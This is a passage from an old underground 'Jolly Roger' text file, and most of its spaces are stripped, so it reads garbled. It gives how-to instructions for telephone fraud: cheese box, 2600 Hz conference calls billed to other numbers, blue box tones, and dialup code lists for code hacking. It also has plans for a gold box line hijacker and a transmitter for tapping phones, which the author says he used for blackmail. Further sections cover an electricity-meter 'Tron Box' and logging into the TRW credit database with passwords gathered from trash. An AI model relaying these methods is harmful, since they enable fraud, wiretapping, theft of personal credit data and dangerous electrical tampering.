HowTo: Afteryoufindthenumbertotheinterceptoperatorinyourprefix,useyour callforwardingandforwardallcallstoher...thiswillmakeyourphonestay offthehook(actually,nowitwaitsforaquartertobedroppedin)...younow haveacheesebox...InOrderToCallOutOnThisLine:YoumustuseyourRed Boxtonesandgeneratethequarterdroppingin...then,youcanmakephonecalls topeople...asfarasIknow,thisisfairlysafe,andtheydonotcheck much...AlthoughIamnotsure,Ithinkyoucanevenmakecreditcardcallsfrom acheeseboxphoneandnotgettraced... 114.Howtostartyourownconferences!byTheJollyRoger BlackBartshowedhowtostartaconferencecallthruan800exchange,andI willnowexplainhowtostartaconferencecallinamoreorthodoxfashion,the 2600Hz.Tone. Firstly,thefonecompanyhaswhatiscalledswitchingsystems.Thereare severaltypes,buttheonewewillconcernourselveswith,isESS(electronic switchingsystem).IfyourareaiszonedforESS,donotstartaconferencecall viathe2600Hz.Tone,orbellsecuritywillnailyourass!Tofindoutifyou areunderESS,callyourlocalbusinessoffice,andaskthemifyoucangetcall waiting/forwarding,andifyoucan,thatmeansthatyouareinESScountry,and conferencecallingisvery,verydangerous!!!Now,ifyouarenotinESS,you willneedthefollowingequipment: AnAppleCATIImodem AcopyofTSPS2orCAT'SMeow Atouchtonefoneline Atouchtonefone.(Truetone)

Now,withTSPS2,dothefollowing: 1. Runtsps2 2. Choseoption1 3. Choseoption6 4. Chosesuboption9 5. Nowtype:15145551212(dashesarenotneeded) 6. Listenwithyourhandset,andassoonasyouhearaloudclick,thentype: $ 7. Togeneratethe2600hz.Tone.Thisobnoxioustonewillcontinueforafew 8. Seconds,thenlistenagainandyoushouldhearanotherloud'click'. 9. Nowtype:km2130801050s 'K'=kptone 'M'=multifrequencymode 'S'=stone 10. Nowlistentothehandsetagain,andwaituntilyouhearthe'click' again.Thentype:km2139752975s 2139751975isthenumbertobilltheconferencecallto. Note:2139751975isadisconnectednumber,andIstronglyadvisethatyouonly billthecalltothisnumber,orthefonecompanywillfindout,andthen.. remember,conferencecallsareitemized,soifyoudobillittoanenemy's number,hecaneasilyfindoutwhodiditandhecanbustyou! Youshouldnowhear3beeps,andashortprerecordedmessage.Fromhereon, everythingisallmenudriven. Conferencecallcommands Fromthe'#'mode: 1=callanumber 6=transfercontrol

7=hangsuptheconferencecall 9=willcallaconferenceoperator

Stayawayfrom7and9!Ifforsomereasonanoperatorgetsonline,hangup!If yougetabusysignalafterkm2130801050s,thatmeansthattheteleconference lineistemporarilydown.Trylater,preferablyfrom9amto5pmweekdays,since conferencecallsareprimarilydesignedforbusinesspeople. 115.GoldBoxPlansbyTheJollyRoger HOWTOBUILDIT Youwillneedthefollowing: Two10KOHMandthree1.4KOHMresistors Two2N3904transistors TwoPhotoCells TwoRedLED'S(Themorelightproducedthebetter) Aboxthatwillnotletlightin RedandGreenWire Lightfromthe#1LEDmustshinedirectlyonthephotocell#1.ThegoldboxI madeneededthetopoftheLED'stotouchthephotocellforittowork. Thesameappliestothe#2photocellandLED. 1 :PHOTOCELL: :: ::BASE :1TTTTT :+LEDTRANSISTOR :TTTTT ::: :I(::COLLECTOR RED1<>::::GREEN2 I(:: :: 2:/+/+//+/+//+/+//+/+/ LED10K10K1.4K1.4K RESISTORES 2 PHOTOCELL :: :BASE: TTTTT: TRANSISTOR: TTTTT: ::EMITTER: GREEN1RED2 :: /+/+/ 1.4K The1.4Kresistorisvariableandifthesecondpartofthegoldboxisskipped itwillstillworkbutwhensomeonepicksupthephonetheywillhearafaint dialtoneinthebackgroundandmightreportittotheGestapoer...(AT&T).1.4K willgiveyougoodreceptionwithlittleriskofaGestapoagentatyourdoor. Nowthatyouhavebuiltittaketwogreenwiresofthesamelengthandstripthe ends,twisttwoendstogetherandconnectthemtogreen1andplaceapieceof tapeonitwith"line#1"writingonit.

Continuetheprocesswithred1onlyuseredwire.Repeatwithred2andgreen2 butchangetoline#2. HOWTOINSTALL Youwillneedtofindtwophonelinesthatareclosetogether.Labeloneofthe phonelines"Line#1".Cutthephonelinesandtaketheoutercoatingoffit. Thereshouldbe4wires.Cuttheyellowandblackwiresoffandstripthered andgreenwiresforbothlines. Line#1shouldbeintwopieces.Takethegreenwireofoneendandconnectit tooneofthegreenwiresonthegoldbox.Taketheotherhalfofline#1and hookthefreegreenwiretothegreenwireonthephoneline.Repeattheprocess withred1andtheotherline.Allyouneedtodonowistowritedownthephone numbersoftheplaceyouhookeditupatandgohomeandcallit.Youshouldget adialtone!!!Ifnot,trychangingtheemitterwiththecollector. 116.TheHistoryofESSbyTheJollyRoger Ofallthenew1960swondersoftelephonetechnologysatellites,ultramodern TrafficServicePositions(TSPS)foroperators,thepicturephone,andsoon theonethatgaveBellLabsthemosttrouble,andunexpectedlybecamethe greatestdevelopmenteffortinBellSystem'shistory,wastheperfectionofan electronicswitchingsystem,orESS. Itmayberecalledthatsuchasystemwasthespecificendinviewwhenthe projectthathadculminatedintheinventionofthetransistorhadbeenlaunched backinthe1930s.Aftersuccessfulaccomplishmentofthatplannedmiraclein 194748,furtherdelayswerebroughtaboutbyfinancialstringencyandtheneed forfurtherdevelopmentofthetransistoritself.Intheearly1950s,aLabs teambeganseriousworkonelectronicswitching.Asearlyas1955,Western ElectricbecameinvolvedwhenfiveengineersfromtheHawthorneworkswere assignedtocollaboratewiththeLabsontheproject.ThepresidentofAT&Tin 1956,wroteconfidently,"AtBellLabs,developmentofthenewelectronic switchingsystemisgoingfullspeedahead.Wearesurethiswillleadtomany improvementsinserviceandalsotogreaterefficiency.Thefirstservicetrial willstartinMorris,Ill.,in1959."Shortlythereafter,Kappelsaidthatthe costofthewholeprojectwouldprobablybe$45million. Butitgraduallybecameapparentthatthedevelopmentofacommerciallyusable electronicswitchingsystemineffect,acomputerizedtelephoneexchange presentedvastlygreatertechnicalproblemsthanhadbeenanticipated,andthat, accordingly,BellLabshadvastlyunderestimatedboththetimeandthe investmentneededtodothejob.Theyear1959passedwithoutthepromisedfirst trialatMorris,Illinois;itwasfinallymadeinNovember1960,andquickly showedhowmuchmoreworkremainedtobedone.Astimedraggedonandcosts mounted,therewasaconcernatAT&TandsomethingapproachingpanicatBell Labs.Buttheprojecthadtogoforward;bythistimetheinvestmentwastoo greattobesacrificed,andinanycase,forwardprojectionsofincreaseddemand fortelephoneserviceindicatedthatwithinafewyearsatimewouldcomewhen, withoutthequantumleapinspeedandflexibilitythatelectronicswitching wouldprovide,thenationalnetworkwouldbeunabletomeetthedemand.In November1963,anallelectronicswitchingsystemwentintouseattheBrown EngineeringCompanyatCocoaBeach,Florida.Butthiswasasmallinstallation, essentiallyanothertestinstallation,servingonlyasinglecompany.Kappel's toneonthesubjectinthe1964annualreportwas,forhim,analmost apologetic:"Electronicswitchingequipmentmustbemanufacturedinvolumeto unprecedentedstandardsofreliability....Toturnouttheequipment economicallyandwithgoodspeed,massproductionmethodsmustbedeveloped; but,atthesametime,therecanbenolossofprecision..."Anotheryearand millionsofdollarslater,onMay30,1965,thefirstcommercialelectric

centralofficewasputintoserviceatSuccasunna,NewJersey. EvenatSuccasunna,only200ofthetown's4,300subscribersinitiallyhadthe benefitofelectronicswitching'saddedspeedandadditionalservices,suchas provisionforthreepartyconversationsandautomatictransferofincoming calls.Butafterthat,ESSwasonitsway.InJanuary1966,thesecond commercialinstallation,thisoneserving2,900telephones,wentintoservicein Chase,Maryland.Bytheendof1967therewereadditionalESSofficesin California,Connecticut,Minnesota,Georgia,NY,Florida,andPennsylvania;by theendof1970therewere120officesserving1.8millioncustomers;andby 1974therewere475officesserving5.6millioncustomers. Thedifferencebetweenconventionalswitchingandelectronicswitchingisthe differencebetween"hardware"and"software";intheformercase,maintenanceis doneonthespot,withscrewdriverandpliers,whileinthecaseofelectronic switching,itcanbedoneremotely,bycomputer,fromacentralpoint,makingit possibletohaveonlyoneortwotechniciansondutyatatimeateachswitching center.Thedevelopmentprogram,whenthefinalfigureswereaddedup,wasfound tohaverequiredastaggeringfourthousandmanyearsofworkatBellLabsand tohavecostnot$45millionbut$500million! 117.TheLunchBoxbyTheJollyRoger Introduction TheLunchBoxisaVERYsimpletransmitterwhichcanbehandyforallsortsof things.Itisquitesmallandcaneasilybeputinanumberofplaces.Ihave successfullyuseditfortappingfones,gettinginsideinfo,blackmailandother suchthings.Thepossibilitiesareendless.Iwillalsoincludetheplansoran equallysmallreceiverforyournewlymadetoy.Useitforjustaboutanything. Youcanalsomakethetransmitterandreceivertogetherinoneboxanduseitas awalkietalkie. Materialsyouwillneed (1)9voltbatterywithbatteryclip (1)25mfd,15voltelectrolyticcapacitor (2).0047mfdcapacitors (1).022mfdcapacitor (1)51pfcapacitor (1)365pfvariablecapacitor (1)Transistorantennacoil (1)2N366transistor (1)2N464transistor (1)100kresistor (1)5.6kresistor (1)10kresistor (1)2megpotentiometerwithSPSTswitch Somegoodwire,solder,solderingiron,boardtoputiton,box(optional) SchematicforTheLunchBox Thismaygetatadconfusingbutjustprintitoutandpayattention. [!] ! 51pf ! +basecollector !)(2N366++/\/\/GND 365pf()emitter! !)(!! ++!! !!!!!

GND/.022mfd!! 10k\!!! /GND+emitter !!!2N464 /.0047!basecollector 2meg\+!!++! /!GND!!! GND!!! ++.0047++!! !+25mfd+ +!! microphone+/\/\/+ +100k! ! GND>/<!+!+!++ switchBattery from2megpot. Notesabouttheschematic 1. GNDmeansground 2. TheGNDneartheswitchandtheGNDbythe2megpotentiometershouldbe connected. 3. Whereyousee:)( () )(itisthetransistorantennacoilwith15turnsof regularhookupwirearoundit. 4. Themiddleoftheloopontheleftside(theleftof"()")youshouldrun awiredowntothe"+"whichhasnothingattachedtoit.Thereisa.0047 capacitoronthecorrectpieceofwire. 5. Forthemicrophoneuseamagneticearphone(1kto2k). 6. Whereyousee"[!]"istheantenna.Useabout8feetofwiretobroadcast approx.300ft.Part15oftheFCCrulesandregulationsaysyoucan'tbroadcast over300feetwithoutalicense.(Hahaha).Usemorewireforanantennafor longerdistances.(Attachittotheblackwireonthefonelineforabouta250 footantenna!) OperationoftheLunchBox ThistransmitterwillsendthesignalsovertheAMradioband.Youusethe variablecapacitortoadjustwhatfreq.youwanttouse.Findagoodunused freq.downatthelowerendofthescaleandyou'reset.Usethe2megpot.to adjustgain.Justfuckwithituntilyougetwhatsoundsgood.Theswitchonthe 2megisforturningtheLunchBoxonandoff.Wheneverythingisadjusted,turn onanAMradioadjustittowhereyouthinkthesignalis.Haveafriendlay someshitthrutheBoxandtuneintoit.That'sallthereistoit.Theplans forasimplereceiverareshownbelow: TheLunchBoxreceiver (1)9voltbatterywithbatteryclip (1)365pfvariablecapacitor (1)51pfcapacitor (1)1N38Bdiode (1)Transistorantennacoil (1)2N366transistor (1)SPSTtoggleswitch (1)1kto2kmagneticearphone Schematicforreceiver [!] ! 51pf

! +++ !! )365pf (+! )!! ++GND ! +*>!basecollector diode2N366earphone emitter+ !! GND! + battery + GND>/<+ switch Closingstatement Thistwodevicescanbebuiltforunderatotalof$10.00.Nottoobad.Using thesedevicesinillegalwaysisyouroption.Ifyougetcaught,IacceptNO responsibilityforyouractions.Thiscanbealotoffunifusedcorrectly. Hookituptotheredwireonthephonelineanditwillsendtheconversation overtheairwaves. 118.OliveBoxPlansbyTheJollyRoger Thisisarelativelynewbox,andallitbasicallydoesisserveasaphone ringer.Youhavetwochoicesforringers,apiezoelectrictransducer(ringer), orastandard8ohmspeaker.Thespeakerhasamorepleasanttonetoit,but eitherwilldofine.Thiscircuitcanalsobeusedinconjunctionwitharust boxtocontrolanexternalsomethingorotherwhenthephonerings.Justconnect the8ohmspeakeroutputtotheinputsontherustbox,andcontrolthepotto tuneittolightthelight(whichcanbereplacedbyarelayforexternal controlling)whenthephonerings. ______________ ||^ NC|54|/\/\/>G ||/R2 G<)||63|NC |C3|U1| |72|>TORINGER || |81| ||______________|| |/\/\/|(L1 |R1C1 L2 a.MainringerTTLcircuit (>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<) _ FROMPIN2<||_||>G P1 b.Piezoelectrictransducer

(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<) __/| FROMPIN2<|(..||/| >||<|S1|| >||<||| >||<||__|\| G<.>||<.\| T1 c.Electromagnetictransducer PartsList U1TexasInstrumentsTCM1506 T14000:8ohmaudiotransformer S18ohmspeaker R12.2kresistor R2Externalvariableresistor;adjuststimingfrequency C1.47uFcapacitor C2.1uFcapacitor C310uFcapacitor L1Tip L2Ring L1andL2arethephoneline. ShiftRate: Thisistheformulafordeterminingtheshiftrate: 11 SR===6Hz (DSR(1/f1)+DSR(1/f2))128128 + 17141500 DSR=ShiftDeviderRateratio=128 f1=HighOutputFrequency=1714 f2=LowOutputFrequency=1500

119.TheTronBoxbyTheGREATCaptainCrunch!! RF IIII IIII (C)(C)(C) IIII IIII (C)=capacitor F=fuse R=resistor I,arewire

PartsList: (3)electrolyticcapacitorsratedat50V(lowest).47UF (1)2030OHMWattresistor (1)120Voltfuse(ampratingbesttouseatleasthalfoftotalhouse currentorevenlessitkeepsyoufromblowingyourbreakerjustincase...) (1)powercord(cutupanextensioncord.Needplugpartandwire)

(1)electricallyinsulatedboxfortherestofus.Ifyourdon'tfeel comfortableaboutelectricitythendon'tplaywiththis.Thereisvoltage presentthatwill***killyou***. Thethingworkswhentheloadinyourhouseislowlikeatnighttime.Itwill putareversephasesignalonthelineandcancelouttheotherphaseandputa reversephaserunningeverythinginthehouse.Wellifyouhaveeverswitched thepowerleadsonaD\C(batterypowered)motoryouwillseethatitruns backwardswellyourelectricmetersortofworksthisway...soreversephase makesthemeterslowdownandifyourluckyitwillgobackwards.Anywayit meansacheaperelectricbill. 120.MoreTRWInfobyTheJollyRoger TRWisalargedatabaseinwhichcompany'sandbankscanruncreditcheckson theircustomers.Example:JohnJonesorders$500worthofstereoequipmentfrom theJoeBlowElectronicdistributingCo.Wellitcouldbethathegavethe companyaphonycreditcardnumber,ordoesn'thaveenoughcredit,etc.Well theycallupTRWandthenrunacheckonhim,TRWthenlistshiscardnumbers (everythingfromsearstovisa)andtellsthenumbers,credit,whenhelostit last(ifheeverdid)andthenofcoursetellsifhehashadanypriorproblems payinghisbills. IwouldalsoliketoaddthatalthoughTRWcontainsinformationonmillionsof people,noteverypartofthecountryisserved,althoughthemajorareaare.. Soifyouhatesomeoneandliveinasmallstate,youprobablywontbeableto orderhim300pinktoiletseatsfromKmart. Loggingon Tologon,youdialupyourlocalaccessnumber(orlongdistance,whatever turnsyouon)andwaitforittosay"TRW"atthisprompt,youtypeeitheran "A"ora"CtrlG"anditwillsay"circuitbuildinginprogress"itwillwait foraminuteandthenclearthescreen,nowyouwilltypeoneofthefollowing. Tca1 Tca2 Tnj1 Tga1 Thisistotellitwhatgeographicalareathecustomerisin,itreallydoesn't matterwhichyouuse,becauseTRWwillautomaticallyswitchwhenitfindsthe record.. Next,youwilltypeinthepswdandinfoonthepersonyouaretryingtoget creditinfoon.Youtypeitinaformatlikethis: RtsPswdLnameFname...,HousenumberFirstletterofstreetnameZipnowyou typectrlsand2ctrlQ'shereiswhatitlookslikeinreallife: Ae:Dialingxxxxxxxxxx (screenclear) TRW^G circuitbuildinginprogress (pause...screenclear) Tca1 Rtc3966785cm5JohnsonDavid...,4567

R56785 ^s^q^q andthenitwillwaitforafewsecondsandprintoutthefileonhim(ifitcan locateonefortheguy) Note:Youmayhavetopushreturnwhenyoufirstconnecttogetthesystems attention. GettingYourPasswords Toobtainpswds,yougodowntoyourfavoritebankorsearsstoreanddig throughthetrash(hencethenametrashing)lookingforprintouts,iftheyarea bigenoughplace,andliveinaTRWarea,thentheywillprobablyhavesome. Theprintoutswillhavethe7digitsubscribercode,leavingthe34digitpswd uptoyou.Muchliketrashingdownatgoodoldmabell. 121.Phreaker'sPhunhousebytheJollyRoger ThelongawaitedprequiltoPhreaker'sGuidehasfinallyarrived.Conceivedfrom theboredomandlonelinessthatcouldonlybederivedfrom:TheTraveler!But now,hehasreturnedinfullstrength(afterasmallvacation)andishereto 'WorldPremiere'thenewfileseverywhere.Staycool.Thisistheprequiltothe firstone,sojustrelax.Thisisnotmadetobeanexclusiveultraelitefile, sokindacalmdownandwatchinthebackgroundifyouaretoocoolforit. PhreakDictionary Hereyouwillfindsomeofthebasicbutnecessarytermsthatshouldbeknownby anyphreakwhowantstoberespectedatall. Phreak: 1. Theactionofusingmischievousandmostlyillegalwaysinordertonot payforsomesortoftelecommunicationsbill,order,transfer,orotherservice. Itofteninvolvesusageofhighlyillegalboxesandmachinesinordertodefeat thesecuritythatissetuptoavoidthissortofhappening.[fr'eaking].v. 2. Apersonwhousestheabovemethodsofdestructionandchaosinorderto makeabetterlifeforall.Atruephreakerwillnotgoagainsthisfellowsor narconpeoplewhohaveraggedonhimordoanythingtermedtobedishonorable tophreaks.[fr'eek].n. 3. Acertaincodeordialupusefulintheactionofbeingaphreak.(Example: "Ihackedanewmetrophreaklastnight.") SwitchingSystem: 1. Thereare3mainswitchingsystemscurrentlyemployedintheUS,andafew othersystemswillbementionedasbackground. SxS:Thissystemwasinventedin1918andwasemployedinoverhalfofthe countryuntil1978.Itisaverybasicsystemthatisageneralwasteofenergy andhardworkonthelinesman.Agoodwaytoidentifythisisthatitrequiresa coininthephoneboothbeforeitwillgiveyouadialtone,orthatnocall waiting,callforwarding,oranyothersuchserviceisavailable.Standsfor: StepbyStep XB:Thisswitchingsystemwasfirstemployedin1978inordertotakecare ofmostofthefaultsofSxSswitching.Notonlyisitmoreefficient,butit alsocansupportdifferentservicesinvariousforms.XB1isCrossbarVersion1. ThatisverylimitedandishardtodistinguishfromSxSexceptbydirectview ofthewiringinvolved.NextupwasXB4,CrossbarVersion4.Withthissystem, someofthebasicthingslikeDTMFthatwerenotavailablewithSxScanbe accomplished.ForthefinalstrokeofXB,XB5wascreated.Thisisaservice thatcanallowDTMFplusmost800typeservices(whichwerenotalways available.)Standsfor:Crossbar. ESS:Anightmareintelecom.Invividcolor,ESSisaprettybadthingto havetostandupto.Itisquitesimpletoidentify.Dialing911for

emergencies,andANI[seeANIbelow]arethemostcommonfacetsofthedread system.ESShasthecapabilitytolistinaperson'scallerlogwhatnumberwas called,howlongthecalltook,andeventhestatusoftheconversation(modem orotherwise.)SinceESShasbeenemployed,whichhasbeenveryrecently,ithas gonethroughmanykindsofrevisions.ThelatestsystemtodateisESS11a,that isemployedinWashingtonD.C.forsecurityreasons.ESSistrulytroublefor anyphreak,becauseitis'smarter'thantheothersystems.Forinstance,ifon yourcallerlogtheysaw50callsto18004219438,theywouldbeabletodoa CN/A[seeLoopholesbelow]onyournumberanddeterminewhetheryouare subscribedtothatserviceornot.Thismakesmostcallsahazard,because although800numbersappeartobefree,theyarerecordedonyourcallerlogand thenrightbeforeyoureceiveyourbillitdeletesthebillingsforthem.But beforethattheareopentoinspection,whichisonereasonwhyextendeduseof anycodeisdangerousunderESS.Someoftheboxes[seeBoxingbelow]areunable tofunctioninESS.Itisgenerallyamenacetothetruephreak.StandsFor: ElectronicSwitchingSystem.Becausetheycouldappearonafiltersomewhereor maybeitisjustnicetoknowthemanyways. SSS:StrowgerSwitchingSystem.Firstnonoperatorsystemavailable. WES:WesternElectronicsSwitching.Usedabout40yearsagowithsome minorplacesoutwest. Boxing: 1. Theuseofpersonallydesignedboxesthatemitorcancelelectronical impulsesthatallowsimpleractingwhilephreaking.Throughtheuseofseparate boxes,youcanaccomplishmostfeatspossiblewithorwithoutthecontrolofan operator. 2. Someboxesandtheirfunctionsarelistedbelow.Onesmarkedwith'*' indicatethattheyarenotoperatableinESS. *BlackBox:Makesitseemtothephonecompanythatthephonewasnever pickedup. BlueBox:Emitsa2600hztonethatallowsyoutodosuchthingsasstacka trunkline,kicktheoperatoroffline,andothers. RedBox:Simulatesthenoiseofaquarter,nickel,ordimebeingdropped intoapayphone. CheeseBox:Turnsyourhomephoneintoapayphonetothrowofftraces(a redboxisusuallyneededinordertocallout.) *ClearBox:GivesyouadialtoneonsomeoftheoldSxSpayphoneswithout puttinginacoin. BeigeBox:Asimplerproducedlinesman'shandsetthatallowsyoutotap intophonelinesandextractbyeavesdropping,orcrossingwires,etc. PurpleBox:Makesallcallsmadeoutfromyourhouseseemtobelocal calls. ANI[ANI]: 1. AutomaticNumberIdentification.AserviceavailableonESSthatallowsa phoneservice[seeDialupsbelow]torecordthenumberthatanycertaincodewas dialedfromalongwiththenumberthatwascalledandprintbothoftheseonthe customerbill. 2. dialups[seeDialupsbelow]arealldesignedjusttouseANI.Someofthe servicesdonothavetheproperequipmenttoreadtheANIimpulsesyet,butit isimpossibletoseewhichiswhichwithoutbeingbustedornotbustedfirst. Dialups[dy'l'ups]: 1. Anylocalor800extendedoutletthatallowsinstantaccesstoanyservice suchasMCI,Sprint,orAT&Tthatfromtherecanbeusedbyhandpickingor usingaprogramtorevealotherpeoplescodeswhichcanthenbeusedmoderately untiltheyfindoutaboutitandyoumustswitchtoanothercode(preferably beforetheyfindoutaboutit.) 2. Dialupsareextremelycommononbothsenses.Somedialupsrevealthe companythatoperatesthemassoonasyouhearthetone.Othersaremuchharder andsomeyoumayneverbeabletoidentify.Asmalllistofdialups: 18004219438(5digitcodes)

18005476754(6digitcodes) 18003450008(6digitcodes) 18007343478(6digitcodes) 18002222255(5digitcodes) 3. Codes:Codesareveryeasilyaccessedprocedureswhenyoucalladialup. Theywillgiveyousomesortoftone.Ifthetonedoesnotendin3seconds, thenpunchinthecodeandimmediatelyfollowingthecode,thenumberyouare dialingbutstrikethe'1'inthebeginningoutfirst.Ifthetonedoesend, thenpunchinthecodewhenthetoneends.Then,itwillgiveyouanothertone. Punchinthenumberyouaredialing,ora'9'.Ifyoupunchina'9'andthe tonestops,thenyoumessedupalittle.Ifyoupunchinatoneandthetone continues,thensimplydialthennumberyouarecallingwithoutthe'1'. 4. Allcodesarenotuniversal.TheonlytypethatIknowofthatistruly universalisMetrophone.AlmosteverymajorcityhasalocalMetrodialup(for Philadelphia,(215)3510100/0126)andsincethecodesareuniversal,almost everyphreakhasusedthemonceortwice.TheydonotemployANIinanyoutlets thatIknowof,sofeelfreetocheckthroughyourbooksandcall5551212or, asamoredeviousmanor,subscribeyourself.Then,neveruseyourowncode.That way,iftheycheckuponyouduetoyourcallerlog,theycanusuallyfindout thatyouaresubscribed.Notonlythatbutyoucouldsetaphreakhackeraround thatareaandjustletithackaway,sincetheyusuallygroupthem,and,asa bonus,youwillhavetheirlocaldialup. 5. 950's.Theyseemlikeaperfectlycoolphreakersdream.Theyarefreefrom yourhouse,frompayphones,fromeverywhere,andtheyhostallofthemajorlong distancecompanies(950)1044,(950)1077,9501088,9501033.)Well,they aren't.TheyweredesignedforANI.Thatisthepoint,endofdiscussion. Aphreakdictionary.Ifyourememberallofthethingscontainedonthat fileupthere,youmayhaveabetterchanceofdoingwhateveritisyoudo.This nextsectionismaybealittlemoreinteresting... BlueBoxPlans: Thesearesomeblueboxplans,butfirst,bewarned,therehavebeen2600hztone detectorsoutonoperatortrunklinessinceXB4.Theideabehinditistousea 2600hztoneforafewverynaughtyfunctionsthatcanreallymakeyourday lightenup.Butfirst,herearetheplans,ortheheartofthefile: 700:1:2:4:7:11: 900:+:3:5:8:12: 1100:+:+:6:9:KP: 1300:+:+:+:10:KP2: 1500:+:+:+:+:ST: :700:900:1100:1300:1500: Stop!Beforeyoudiehardusersstartpiecingthoselittletonetidbitstogether, thereisasimplermethod.IfyouhaveanAppleCatwithaprogramlikeCat's MeowIV,thenyoucangeneratethenecessarytones,the2600hztone,theKP tone,theKP2tone,andtheSTtonethroughthedialsection.Soifyouhave thatIwillassumeyoucanbootitupanditworks,andI'lldoyouthefavorof tellingyouandtheotheruserswhattodowiththeblueboxnowthatyouhave somehowconstructedit.Theconnectiontoanoperatorisoneofthemostwell knownandusedwaysofhavingfunwithyourbluebox.YousimplydialaTSPS (TrafficServicePositioningStation,ortheoperatoryougetwhenyoudial'0') andblowa2600hztonethroughtheline.Watchout!Donotdialthisdirect! Afteryouhavedonethat,itisquitesimpletohavefunwithit.BlowaKPtone tostartacall,aSTtonetostopit,anda2600hztonetohangup.Onceyou haveconnectedtoit,herearesomefunnumberstocallwithit: 07004561000Teleconference(free,becauseyouaretheoperator!) (Areacode)101TollSwitching (Areacode)121LocalOperator(hehe) (Areacode)131Information

(Areacode)141Rate&Route (Areacode)181CoinRefundOperator (Areacode)11511Conferenceoperator(whenyoudial8005446363) Well,thosewerethetonematrixcontrollersfortheblueboxandsome otherhelpfulstufftohelpyoutostartoutwith.Butthoseareonlythe functionswiththeoperator.Thereareotherkfunthingsyoucandowithit. MoreadvancedBlueBoxStuff: Oops.Smallmistakeupthere.Iforgottonelengths.Um,youblowatonepair outforupto1/10ofasecondwithanother1/10secondforsilencebetweenthe digits.KPtonesshouldbesentfor2/10ofasecond.Onewaytoconfusethe 2600hztrapsistosendpinknoiseoverthechannel(forallofyouthathave decentBSRequalizers,thereismajorpinknoiseinthere.) Usingtheoperatorfunctionsistheuseofthe'inward'trunkline.Thatis workingitfromtheinside.Fromthe'outward'trunk,youcandosuchthingsas makeemergencybreakthroughcalls,tapintolines,busyallofthelinesinany trunk(called'stacking'),enableordisabletheTSPS's,andforsome4asystems youcanevenreroutecallstoanywhere. Allright.Theonethingthateverycompletephreakguideshouldbewithoutis blueboxplans,sincetheywereonceavitalpartofphreaking.Anotherthing thateverycompletefileneedsisacompletelistingofallofthe800numbers aroundsoyoucanhavesomemorefun. //800DialupListings// 18003450008(6)18005476754(6) 18002454890(4)18003279136(4) 18005265305(8)18008589000(3) 18004379895(7)18002457508(5) 18003431844(4)18003221415(6) 18004373478(6)18003257222(6) Allright,setCatHacker1.0onthosenumbersandhaveafuckofaday.Thatis enoughwith800codes,bythetimethisgetsaroundtoyouIdon'tknowwhat statethosecodeswillbein,buttrythemalloutanywaysandseewhatyouget. Onsome800servicesnow,theyhaveanoperatorwhowillanswerandaskyoufor yourcode,andthenyourname.Somewillswitchbackandforthbetweenvoiceand toneverification,youcanneverbequitesurewhichyouwillbeupagainst. Armedwiththisknowledgeyoushouldbehavingaprettygoodtimephreakingnow. Butclassisn'toveryet,therearestillacoupleimportantrulesthatyou shouldknow.Ifyouhearcontinualclickingontheline,thenyoushouldassume thatanoperatorismessingwithsomething,maybeevenlisteninginonyou.It isagoodideatocallsomeonebackwhenthephonestartsdoingthat.Ifyou wereusingacode,useadifferentcodeand/orservicetocallhimback. Agoodwaytodetectifacodehasgonebadornotistolistenwhenthenumber hasbeendialed.Ifthecodeisbadyouwillprobablyhearthephoneringing moreclearlyandmorequicklythanifyouwereusingadifferentcode.If someoneanswersvoicetoitthenyoucanimmediatelyassumethatitisan operativeforwhatevercompanyyouareusing.Thefamed'311311'codeforMetro isoneofthose.Youwouldhavetobequitestupidtoactuallyrespond,because whoeveryouaskfortheoperatorwillalwayssay'He'snotinrightnow,canI havehimcallyouback?'andthentheywillaskforyournameandphonenumber. Someofthemoresophisticatedcompanieswillactuallygiveyouacarrierona linethatissupposedtogiveyouacarrierandthenjusthavegarbageflow acrossthescreenlikeitwouldwithabadconnection.Thatisafeebleeffort tomakeyouthinkthatthecodeisstillworkingandmaybegetyoutodial someone'svoice,agoodtestforthecarriertrickistodialanumberthatwill

giveyouacarrierthatyouhaveneverdialedwiththatcodebefore,thatwill allowyoutodeterminewhetherthecodeisgoodornot.Forournextsection,a lighterlookatsomeofthethingsthataphreakshouldnotbewithout.A vocabulary. Afewmonthsago,itwasaquitestrangeworldforthemodempeopleoutthere. Butnow,aphreaker'svocabularyisessentialifyouwannamakeagood impressiononpeoplewhenyoupostwhatyouknowaboutcertainsubjects. //Vocabulary// Donotmisspellexceptcertainexceptions: phone>fone freak>phreak Neversubstitute'z'sfor's's.(i.e.codez>codes) Neverleavemanycharactersafterapost(i.e.HeyDudes!#!@#@!#!@) NEVERusethe'k'prefix(kkool,krad,kwhatever) Donotabbreviate.(Igotlotsawaresw/docs) Neversubstitute'0'for'o'(r0dent,l0zer). Forgetaboutyeolduppercase,itlooksruggyish. Allright,thatwastorelievethetensionofwhatisbeingdrilledintoyour mindsatthemoment.Now,however,backtotheteachingcourse.Herearesome thingsyoushouldknowaboutphonesandbillingsforphones,etc. LATA:LocalAccessTransferenceArea.Somepeoplewholiveinlargecitiesor areasmaybeplaguedbythisproblem.Forinstance,let'ssayyouliveinthe 215areacodeunderthe542prefix(Ambler,FortWashington).Ifyouwentto dialinabasicMetrocodefromthatarea,forinstance,3510100,thatmight notbecountedunderunlimitedlocalcallingbecauseitisoutofyourLATA. ForsomeLATA's,youhavetodiala'1'withouttheareacodebeforeyoucan dialthephonenumber.Thatcouldproveahassleforusallifyoudidn't realizeyouwouldbebilledforthatsortofcall.Inthatway,sometimes,itis bettertobesafethansorryandphreak. TheCallerLog:InESSregions,foreveryhouseholdaround,thephonecompany hassomethingonyoucalledaCallerLog.Thisshowseverysinglenumberthat youdialed,andthingscanbearrangedsoitshowedeverynumberthatwas callingtoyou.That'sonemaindisadvantageofESS,itismostlycomputerized soanumberscancouldbedonelikethatquiteeasily.Usingadialupisaneasy waytoscrewthat,andissomethingworthremembering.Anyways,withthecaller log,theycheckupandseewhatyoudialed.Hmm...youdialed15different800 numbersthatmonth.Soontheyfindthatyouaresubscribedtononeofthose companies.Butthatisnottheonlything.Mostpeoplewouldimagine"Butwait! 800numbersdon'tshowuponmyphonebill!".Tothosepeople,itisanice thought,but800numbersarepickeduponthecallerloguntilrightbeforethey aresentofftoyou.Sotheycancheckrightuponyoubeforetheysenditaway andcannotethefactthatyoufuckedupslightlyandcalledonetoomany800 lines. Rightnow,afterallofthat,youshouldhaveaprettygoodideaofhowtogrow upasagoodphreak.Followtheseguidelines,don'tshowoff,anddon'ttake unnecessaryriskswhenphreakingorhacking.

